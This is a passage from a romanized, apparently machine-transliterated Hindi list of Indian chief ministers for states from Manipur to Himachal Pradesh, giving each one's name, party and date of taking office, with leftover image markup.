23. manipur en. biren sianh 80px|center bhajapa 15 march, 2017
24. madhy pradesh mohan yadav 80px|center bhajapa 13 disanbar, 2023
25. maharashtr ekanath shiande 80px|center shiv sena 30 joon, 2022
26. mizoram laladuhoma 80px|center joram pipals moovameant 8 disambar, 2023
27. meghalay k aaunarad sangama 80px|center enapipi 6 march, 2018
28. rajasthan bhajan lal sharma 80px|center bharatiy janata parti 15 disambar, 2023
29. sikkim prem sianh tamaang 80px|center sikkim kraantikari morcha 27 mee, 2019
30. hariyana nayab sianh saini 80px|center bhajapa 12 march, 2024
31. himachal pradesh sukhaviandar sianh sukkhoo 80px|center bharatiy rashtriy kaangres 11 disambar, 2022